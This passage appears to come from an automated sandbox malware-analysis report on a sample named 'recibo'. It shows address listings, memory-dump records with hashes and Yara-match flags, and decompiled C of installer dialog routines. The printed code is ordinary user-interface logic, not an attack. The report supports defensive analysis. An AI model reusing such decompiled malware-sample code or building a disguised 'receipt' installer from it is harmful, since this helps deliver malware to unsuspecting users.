                                                                                  0x004076fa
                                                                                  0x004076fc
                                                                                  0x00407700
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407702
                                                                                  0x00407702
                                                                                  0x00000000
                                                                                  0x00407704
                                                                                  0x00407728
                                                                                  0x0040772e
                                                                                  0x00407738
                                                                                  0x0040773a
                                                                                  0x0040773f
                                                                                  0x00407741
                                                                                  0x00407777
                                                                                  0x00407743
                                                                                  0x00407743
                                                                                  0x00407746
                                                                                  0x00407749
                                                                                  0x00407753
                                                                                  0x00407756
                                                                                  0x0040775d
                                                                                  0x00407768
                                                                                  0x0040776f
                                                                                  0x0040776f
                                                                                  0x00407779
                                                                                  0x0040777c
                                                                                  0x0040777e
                                                                                  0x00407784
                                                                                  0x00407784
                                                                                  0x0040778d
                                                                                  0x00407790
                                                                                  0x00407795
                                                                                  0x004077a4
                                                                                  0x004077ac
                                                                                  0x004077b1
                                                                                  0x004077d5
                                                                                  0x004077dd
                                                                                  0x004077e1
                                                                                  0x004077e7
                                                                                  0x004077b3
                                                                                  0x004077c1
                                                                                  0x004077c4
                                                                                  0x004077ca
                                                                                  0x004077ca
                                                                                  0x004077eb
                                                                                  0x004077a6
                                                                                  0x004077a6
                                                                                  0x004077a6
                                                                                  0x004077fc
                                                                                  0x00407800
                                                                                  0x0040780c
                                                                                  0x00407807
                                                                                  0x0040780a
                                                                                  0x0040780a
                                                                                  0x00407814
                                                                                  0x00407819
                                                                                  0x00407821
                                                                                  0x0040781d
                                                                                  0x0040781f
                                                                                  0x0040781f
                                                                                  0x00407827
                                                                                  0x00407829
                                                                                  0x00407830
                                                                                  0x0040783a
                                                                                  0x00407844
                                                                                  0x00407860
                                                                                  0x00407864
                                                                                  0x004076a9
                                                                                  0x004076af
                                                                                  0x004076b0
                                                                                  0x004076b2
                                                                                  0x004076b8
                                                                                  0x004076bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407846
                                                                                  0x00407846
                                                                                  0x00407846
                                                                                  0x0040784b
                                                                                  0x00407854
                                                                                  0x0040785d
                                                                                  0x00000000
                                                                                  0x0040785d
                                                                                  0x0040786a
                                                                                  0x0040786a
                                                                                  0x0040786d
                                                                                  0x00407874
                                                                                  0x00407877
                                                                                  0x00000000
                                                                                  0x0040769a
                                                                                  0x0040761a
                                                                                  0x0040761c
                                                                                  0x0040761c
                                                                                  0x00407620
                                                                                  0x00407623
                                                                                  0x00407624
                                                                                  0x00407624
                                                                                  0x00000000
                                                                                  0x0040761c
                                                                                  0x00407590
                                                                                  0x00407596
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                  • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                  • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de714dff64dc0ff7994a5a7ce56d8f94d438fe6a360eb2450c80f19d4ad8ff10
                                                                                  • Instruction ID: a96bed59c20f9a2e96ee8204495dc35e13aa311cda4ca740adbcfdf2694ebb67
                                                                                  • Opcode Fuzzy Hash: de714dff64dc0ff7994a5a7ce56d8f94d438fe6a360eb2450c80f19d4ad8ff10
                                                                                  • Instruction Fuzzy Hash: 3261AE45E2D30AC9DB53207785B53E61386CF272C1E668B6BCC6B73855B31B098E85C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ccbd1f4e5a00f0189e3656c48ca2a2d54ad0f00f7e3a15ed49af5921d80c081c
                                                                                  • Instruction ID: c260d4ee85eb8582a88baa6a79769e0ba625ae13d15c3f85831762222dd24731
                                                                                  • Opcode Fuzzy Hash: ccbd1f4e5a00f0189e3656c48ca2a2d54ad0f00f7e3a15ed49af5921d80c081c
                                                                                  • Instruction Fuzzy Hash: 9A41921E91CB8A85FE33247E49F53E6124EEF937F0D4D521ACC9E53C04B7864A498943
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb5a898b22ff13c3f77d876587266ad02566f13c4898a89dc86018d70388faae
                                                                                  • Instruction ID: f12689b630405b2dd80f11ca984365b1c4776fd42249f89be84f70223ae15452
                                                                                  • Opcode Fuzzy Hash: fb5a898b22ff13c3f77d876587266ad02566f13c4898a89dc86018d70388faae
                                                                                  • Instruction Fuzzy Hash: 3A516B35A013449BCF3B8D25CD753DA3797AF85324F59432BCD095B168C7728A85CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  C-Code - Quality: 96%
                                                                                  			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct HWND__* _v12;
                                                                                  				long _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				signed char* _v32;
                                                                                  				int _v36;
                                                                                  				signed int _v44;
                                                                                  				int _v48;
                                                                                  				signed int* _v60;
                                                                                  				signed char* _v64;
                                                                                  				signed int _v68;
                                                                                  				long _v72;
                                                                                  				void* _v76;
                                                                                  				intOrPtr _v80;
                                                                                  				intOrPtr _v84;
                                                                                  				void* _v88;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t198;
                                                                                  				intOrPtr _t201;
                                                                                  				intOrPtr _t202;
                                                                                  				long _t207;
                                                                                  				signed int _t211;
                                                                                  				signed int _t222;
                                                                                  				void* _t225;
                                                                                  				void* _t226;
                                                                                  				int _t232;
                                                                                  				long _t237;
                                                                                  				long _t238;
                                                                                  				signed int _t239;
                                                                                  				signed int _t245;
                                                                                  				signed int _t247;
                                                                                  				signed char _t248;
                                                                                  				signed char _t254;
                                                                                  				void* _t258;
                                                                                  				void* _t260;
                                                                                  				signed char* _t278;
                                                                                  				signed char _t279;
                                                                                  				long _t284;
                                                                                  				struct HWND__* _t291;
                                                                                  				signed int* _t292;
                                                                                  				int _t293;
                                                                                  				long _t294;
                                                                                  				signed int _t295;
                                                                                  				void* _t297;
                                                                                  				long _t298;
                                                                                  				int _t299;
                                                                                  				signed int _t300;
                                                                                  				signed int _t303;
                                                                                  				signed int _t311;
                                                                                  				signed char* _t319;
                                                                                  				int _t324;
                                                                                  				void* _t326;
                                                                                  
                                                                                  				_t291 = _a4;
                                                                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                  				_v8 = GetDlgItem(_t291, 0x408);
                                                                                  				_t326 = SendMessageW;
                                                                                  				_v24 =  *0x434f28;
                                                                                  				_v28 =  *0x434f10 + 0x94;
                                                                                  				if(_a8 != 0x110) {
                                                                                  					L23:
                                                                                  					if(_a8 != 0x405) {
                                                                                  						_t301 = _a16;
                                                                                  					} else {
                                                                                  						_a12 = 0;
                                                                                  						_t301 = 1;
                                                                                  						_a8 = 0x40f;
                                                                                  						_a16 = 1;
                                                                                  					}
                                                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                  						_v16 = _t301;
                                                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                  							if(( *0x434f19 & 0x00000002) != 0) {
                                                                                  								L41:
                                                                                  								if(_v16 != 0) {
                                                                                  									_t237 = _v16;
                                                                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                  									}
                                                                                  									_t238 = _v16;
                                                                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                  										_t301 = _v24;
                                                                                  										_t239 =  *(_t238 + 0x5c);
                                                                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                  										} else {
                                                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L48;
                                                                                  							}
                                                                                  							if(_a8 == 0x413) {
                                                                                  								L33:
                                                                                  								_t301 = 0 | _a8 != 0x00000413;
                                                                                  								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                                  								_t295 = _t245;
                                                                                  								if(_t295 >= 0) {
                                                                                  									_t94 = _v24 + 8; // 0x8
                                                                                  									_t301 = _t245 * 0x818 + _t94;
                                                                                  									_t247 =  *_t301;
                                                                                  									if((_t247 & 0x00000010) == 0) {
                                                                                  										if((_t247 & 0x00000040) == 0) {
                                                                                  											_t248 = _t247 ^ 0x00000001;
                                                                                  										} else {
                                                                                  											_t254 = _t247 ^ 0x00000080;
                                                                                  											if(_t254 >= 0) {
                                                                                  												_t248 = _t254 & 0x000000fe;
                                                                                  											} else {
                                                                                  												_t248 = _t254 | 0x00000001;
                                                                                  											}
                                                                                  										}
                                                                                  										 *_t301 = _t248;
                                                                                  										E0040117D(_t295);
                                                                                  										_a12 = _t295 + 1;
                                                                                  										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                                  										_a8 = 0x40f;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L41;
                                                                                  							}
                                                                                  							_t301 = _a16;
                                                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                  								goto L41;
                                                                                  							}
                                                                                  							goto L33;
                                                                                  						} else {
                                                                                  							goto L48;
                                                                                  						}
                                                                                  					} else {
                                                                                  						L48:
                                                                                  						if(_a8 != 0x111) {
                                                                                  							L56:
                                                                                  							if(_a8 == 0x200) {
                                                                                  								SendMessageW(_v8, 0x200, 0, 0);
                                                                                  							}
                                                                                  							if(_a8 == 0x40b) {
                                                                                  								_t225 =  *0x42d24c;
                                                                                  								if(_t225 != 0) {
                                                                                  									ImageList_Destroy(_t225);
                                                                                  								}
                                                                                  								_t226 =  *0x42d260;
                                                                                  								if(_t226 != 0) {
                                                                                  									GlobalFree(_t226);
                                                                                  								}
                                                                                  								 *0x42d24c = 0;
                                                                                  								 *0x42d260 = 0;
                                                                                  								 *0x434f60 = 0;
                                                                                  							}
                                                                                  							if(_a8 != 0x40f) {
                                                                                  								L90:
                                                                                  								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                  									ShowWindow(_v8, _t324);
                                                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                  								}
                                                                                  								goto L93;
                                                                                  							} else {
                                                                                  								E004011EF(_t301, 0, 0);
                                                                                  								_t198 = _a12;
                                                                                  								if(_t198 != 0) {
                                                                                  									if(_t198 != 0xffffffff) {
                                                                                  										_t198 = _t198 - 1;
                                                                                  									}
                                                                                  									_push(_t198);
                                                                                  									_push(8);
                                                                                  									E00404ED4();
                                                                                  								}
                                                                                  								if(_a16 == 0) {
                                                                                  									L75:
                                                                                  									E004011EF(_t301, 0, 0);
                                                                                  									_v36 =  *0x42d260;
                                                                                  									_t201 =  *0x434f28;
                                                                                  									_v64 = 0xf030;
                                                                                  									_v24 = 0;
                                                                                  									if( *0x434f2c <= 0) {
                                                                                  										L86:
                                                                                  										if( *0x434fbe == 0x400) {
                                                                                  											InvalidateRect(_v8, 0, 1);
                                                                                  										}
                                                                                  										_t202 =  *0x433edc; // 0x5c09b6
                                                                                  										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
                                                                                  											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                                  										}
                                                                                  										goto L90;
                                                                                  									}
                                                                                  									_t292 = _t201 + 8;
                                                                                  									do {
                                                                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                  										if(_t207 != 0) {
                                                                                  											_t303 =  *_t292;
                                                                                  											_v72 = _t207;
                                                                                  											_v76 = 8;
                                                                                  											if((_t303 & 0x00000001) != 0) {
                                                                                  												_v76 = 9;
                                                                                  												_v60 =  &(_t292[4]);
                                                                                  												_t292[0] = _t292[0] & 0x000000fe;
                                                                                  											}
                                                                                  											if((_t303 & 0x00000040) == 0) {
                                                                                  												_t211 = (_t303 & 0x00000001) + 1;
                                                                                  												if((_t303 & 0x00000010) != 0) {
                                                                                  													_t211 = _t211 + 3;
                                                                                  												}
                                                                                  											} else {
                                                                                  												_t211 = 3;
                                                                                  											}
                                                                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                  										}
                                                                                  										_v24 = _v24 + 1;
                                                                                  										_t292 =  &(_t292[0x206]);
                                                                                  									} while (_v24 <  *0x434f2c);
                                                                                  									goto L86;
                                                                                  								} else {
                                                                                  									_t293 = E004012E2( *0x42d260);
                                                                                  									E00401299(_t293);
                                                                                  									_t222 = 0;
                                                                                  									_t301 = 0;
                                                                                  									if(_t293 <= 0) {
                                                                                  										L74:
                                                                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                  										_a16 = _t293;
                                                                                  										_a8 = 0x420;
                                                                                  										goto L75;
                                                                                  									} else {
                                                                                  										goto L71;
                                                                                  									}
                                                                                  									do {
                                                                                  										L71:
                                                                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                  											_t301 = _t301 + 1;
                                                                                  										}
                                                                                  										_t222 = _t222 + 1;
                                                                                  									} while (_t222 < _t293);
                                                                                  									goto L74;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                  							goto L93;
                                                                                  						} else {
                                                                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                  							if(_t232 == 0xffffffff) {
                                                                                  								goto L93;
                                                                                  							}
                                                                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                  								_t294 = 0x20;
                                                                                  							}
                                                                                  							E00401299(_t294);
                                                                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                  							_a12 = _a12 | 0xffffffff;
                                                                                  							_a16 = 0;
                                                                                  							_a8 = 0x40f;
                                                                                  							goto L56;
                                                                                  						}
                                                                                  					}
                                                                                  				} else {
                                                                                  					_v36 = 0;
                                                                                  					_v20 = 2;
                                                                                  					 *0x434f60 = _t291;
                                                                                  					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                                  					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                                  					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                                  					_t297 = _t258;
                                                                                  					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                  					 *0x42d24c = _t260;
                                                                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                  					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                  					}
                                                                                  					DeleteObject(_t297);
                                                                                  					_t298 = 0;
                                                                                  					do {
                                                                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                  							if(_t298 != 0x20) {
                                                                                  								_v20 = 0;
                                                                                  							}
                                                                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                  						}
                                                                                  						_t298 = _t298 + 1;
                                                                                  					} while (_t298 < 0x21);
                                                                                  					_t299 = _a16;
                                                                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                  					_push(0x15);
                                                                                  					E00404499(_a4);
                                                                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                  					_push(0x16);
                                                                                  					E00404499(_a4);
                                                                                  					_t300 = 0;
                                                                                  					_v16 = 0;
                                                                                  					if( *0x434f2c <= 0) {
                                                                                  						L19:
                                                                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                  						goto L20;
                                                                                  					} else {
                                                                                  						_t319 = _v24 + 8;
                                                                                  						_v32 = _t319;
                                                                                  						do {
                                                                                  							_t278 =  &(_t319[0x10]);
                                                                                  							if( *_t278 != 0) {
                                                                                  								_v64 = _t278;
                                                                                  								_t279 =  *_t319;
                                                                                  								_v88 = _v16;
                                                                                  								_t311 = 0x20;
                                                                                  								_v84 = 0xffff0002;
                                                                                  								_v80 = 0xd;
                                                                                  								_v68 = _t311;
                                                                                  								_v44 = _t300;
                                                                                  								_v72 = _t279 & _t311;
                                                                                  								if((_t279 & 0x00000002) == 0) {
                                                                                  									if((_t279 & 0x00000004) == 0) {
                                                                                  										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                  									} else {
                                                                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                  									}
                                                                                  								} else {
                                                                                  									_v80 = 0x4d;
                                                                                  									_v48 = 1;
                                                                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                  									_v36 = 1;
                                                                                  									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                                  									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                                  								}
                                                                                  							}
                                                                                  							_t300 = _t300 + 1;
                                                                                  							_t319 =  &(_v32[0x818]);
                                                                                  							_v32 = _t319;
                                                                                  						} while (_t300 <  *0x434f2c);
                                                                                  						if(_v36 != 0) {
                                                                                  							L20:
                                                                                  							if(_v20 != 0) {
                                                                                  								E004044CE(_v8);
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								ShowWindow(_v12, 5);
                                                                                  								E004044CE(_v12);
                                                                                  								L93:
                                                                                  								return E00404500(_a8, _a12, _a16);
                                                                                  							}
                                                                                  						}
                                                                                  						goto L19;
                                                                                  					}
                                                                                  				}
                                                                                  			}
                                                                                  0x00405075
                                                                                  0x00405078
                                                                                  0x0040507b
                                                                                  0x0040507e
                                                                                  0x0040507e
                                                                                  0x00405084
                                                                                  0x0040508d
                                                                                  0x00405090
                                                                                  0x00405094
                                                                                  0x00405097
                                                                                  0x0040509a
                                                                                  0x004050a3
                                                                                  0x004050ac
                                                                                  0x004050af
                                                                                  0x004050b2
                                                                                  0x004050b5
                                                                                  0x004050f3
                                                                                  0x0040511e
                                                                                  0x004050f5
                                                                                  0x00405104
                                                                                  0x00405104
                                                                                  0x004050b7
                                                                                  0x004050ba
                                                                                  0x004050c8
                                                                                  0x004050d2
                                                                                  0x004050da
                                                                                  0x004050e1
                                                                                  0x004050ec
                                                                                  0x004050ec
                                                                                  0x004050b5
                                                                                  0x00405124
                                                                                  0x00405125
                                                                                  0x00405131
                                                                                  0x00405131
                                                                                  0x0040513d
                                                                                  0x00405158
                                                                                  0x0040515b
                                                                                  0x00405178
                                                                                  0x00000000
                                                                                  0x0040515d
                                                                                  0x00405162
                                                                                  0x0040516b
                                                                                  0x004054fe
                                                                                  0x00405510
                                                                                  0x00405510
                                                                                  0x0040515b
                                                                                  0x00000000
                                                                                  0x0040513d
                                                                                  0x0040506f

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                  • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                  • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                  • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                  • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                  • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $M$N
                                                                                  • API String ID: 2564846305-813528018
                                                                                  • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                  • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                  • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                  • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				int _v12;
                                                                                  				void* _v16;
                                                                                  				struct HWND__* _t56;
                                                                                  				intOrPtr _t69;
                                                                                  				signed int _t75;
                                                                                  				signed short* _t76;
                                                                                  				signed short* _t78;
                                                                                  				long _t92;
                                                                                  				int _t103;
                                                                                  				signed int _t110;
                                                                                  				intOrPtr _t111;
                                                                                  				intOrPtr _t113;
                                                                                  				WCHAR* _t114;
                                                                                  				signed int* _t116;
                                                                                  				WCHAR* _t117;
                                                                                  				struct HWND__* _t118;
                                                                                  
                                                                                  				if(_a8 != 0x110) {
                                                                                  					if(_a8 != 0x111) {
                                                                                  						L13:
                                                                                  						if(_a8 != 0x4e) {
                                                                                  							if(_a8 == 0x40b) {
                                                                                  								 *0x42b234 =  *0x42b234 + 1;
                                                                                  							}
                                                                                  							L27:
                                                                                  							_t114 = _a16;
                                                                                  							L28:
                                                                                  							return E00404500(_a8, _a12, _t114);
                                                                                  						}
                                                                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                  						_t114 = _a16;
                                                                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                  							_v12 = _t103;
                                                                                  							_v16 = _t113;
                                                                                  							_v8 = 0x432ea0;
                                                                                  							if(_t103 - _t113 < 0x800) {
                                                                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                  								_push(1);
                                                                                  								E00404907(_a4, _v8);
                                                                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                  								_t114 = _a16;
                                                                                  							}
                                                                                  						}
                                                                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                  							goto L28;
                                                                                  						} else {
